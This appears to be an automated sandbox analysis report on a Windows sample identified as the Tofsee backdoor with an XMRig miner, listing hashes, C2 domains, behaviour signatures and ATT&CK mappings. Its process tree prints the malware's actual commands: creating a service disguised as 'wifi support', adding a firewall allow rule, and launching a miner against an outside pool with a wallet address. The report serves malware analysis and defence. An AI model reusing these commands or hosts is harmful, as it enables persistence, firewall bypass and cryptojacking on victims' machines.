Analysis

  • max time kernel
    146s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-02-2023 20:09

General

  • Target

    file.exe

  • Size

    301KB

  • MD5

    ae9dc34b6a8ea00485a79cc48fc59662

  • SHA1

    0e623ec7aaa91275e2fb0bcad85caa360b1fd296

  • SHA256

    3878ebdeaa9e027240ca37b48fc74c9d1f1e58e17708d33b050af65cc2ac66e1

  • SHA512

    a4dd1994fddd471c5ad4394e4c85f9f762bc4a82286d5e902fc5b837d7a9bc5c28e2098b802e21243d833e7b1f8fc6f154857f4712c721d0d1e25d383508a0ae

  • SSDEEP

    3072:CBLb6b6cLxMRGDLx1l9yy70oMh5KGlF2Lw9M4uQjiMTE5/3RbPafVi:C1ZcLxzR1/ooTfLw9BuQj9M3lPat

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vvmwzavn\
      2⤵
        PID:1048
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mlklmwyb.exe" C:\Windows\SysWOW64\vvmwzavn\
        2⤵
          PID:3192
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create vvmwzavn binPath= "C:\Windows\SysWOW64\vvmwzavn\mlklmwyb.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:4912
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description vvmwzavn "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:4800
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start vvmwzavn
          2⤵
          • Launches sc.exe
          PID:5068
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4548
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 1256
          2⤵
          • Program crash
          PID:3176
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1028 -ip 1028
        1⤵
          PID:1792
        • C:\Windows\SysWOW64\vvmwzavn\mlklmwyb.exe
          C:\Windows\SysWOW64\vvmwzavn\mlklmwyb.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe
            2⤵
            • Sets service image path in registry
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:3124
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4956
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 528
            2⤵
            • Program crash
            PID:3452
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4304 -ip 4304
          1⤵
            PID:392

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\mlklmwyb.exe
            Filesize

            13.9MB

            MD5

            f0fe7f25ef90e724a9964793bc7d5b5b

            SHA1

            1a38719ca242d1a0db2c143cc632cd82178308b6

            SHA256

            027e2c1bbb7a6867403f20adce92a40915a4fd71c993b5825b5a47a06e906085

            SHA512

            1417b878d6c93ef7a8390d922025b4a5627bdfb506b1c71bc7b4a16fe1a25a77c26f1b083d2c9c0b17cf095336ee65a697a570b976a86c29fc2a7832f0ff0f71

          • C:\Windows\SysWOW64\vvmwzavn\mlklmwyb.exe
            Filesize

            13.9MB

            MD5

            f0fe7f25ef90e724a9964793bc7d5b5b

            SHA1

            1a38719ca242d1a0db2c143cc632cd82178308b6

            SHA256

            027e2c1bbb7a6867403f20adce92a40915a4fd71c993b5825b5a47a06e906085

            SHA512

            1417b878d6c93ef7a8390d922025b4a5627bdfb506b1c71bc7b4a16fe1a25a77c26f1b083d2c9c0b17cf095336ee65a697a570b976a86c29fc2a7832f0ff0f71

          • memory/1028-134-0x0000000002200000-0x0000000002213000-memory.dmp
            Filesize

            76KB

          • memory/1028-135-0x0000000000400000-0x00000000004C8000-memory.dmp
            Filesize

            800KB

          • memory/1028-132-0x00000000005BE000-0x00000000005D4000-memory.dmp
            Filesize

            88KB

          • memory/1028-144-0x0000000000400000-0x00000000004C8000-memory.dmp
            Filesize

            800KB

          • memory/1028-143-0x00000000005BE000-0x00000000005D4000-memory.dmp
            Filesize

            88KB

          • memory/1048-133-0x0000000000000000-mapping.dmp
          • memory/3124-159-0x00000000023B0000-0x00000000023C0000-memory.dmp
            Filesize

            64KB

          • memory/3124-151-0x0000000000D10000-0x0000000000D25000-memory.dmp
            Filesize

            84KB

          • memory/3124-168-0x0000000002FE0000-0x0000000002FE7000-memory.dmp
            Filesize

            28KB

          • memory/3124-165-0x0000000007C00000-0x000000000800B000-memory.dmp
            Filesize

            4.0MB

          • memory/3124-162-0x0000000002FD0000-0x0000000002FD5000-memory.dmp
            Filesize

            20KB

          • memory/3124-145-0x0000000000000000-mapping.dmp
          • memory/3124-146-0x0000000000D10000-0x0000000000D25000-memory.dmp
            Filesize

            84KB

          • memory/3124-156-0x0000000002380000-0x0000000002386000-memory.dmp
            Filesize

            24KB

          • memory/3124-153-0x0000000002C00000-0x0000000002E0F000-memory.dmp
            Filesize

            2.1MB

          • memory/3124-152-0x0000000000D10000-0x0000000000D25000-memory.dmp
            Filesize

            84KB

          • memory/3192-136-0x0000000000000000-mapping.dmp
          • memory/4304-150-0x0000000000400000-0x00000000004C8000-memory.dmp
            Filesize

            800KB

          • memory/4304-149-0x0000000000739000-0x000000000074F000-memory.dmp
            Filesize

            88KB

          • memory/4548-141-0x0000000000000000-mapping.dmp
          • memory/4800-139-0x0000000000000000-mapping.dmp
          • memory/4912-138-0x0000000000000000-mapping.dmp
          • memory/4956-172-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/4956-171-0x0000000000000000-mapping.dmp
          • memory/4956-177-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/5068-140-0x0000000000000000-mapping.dmp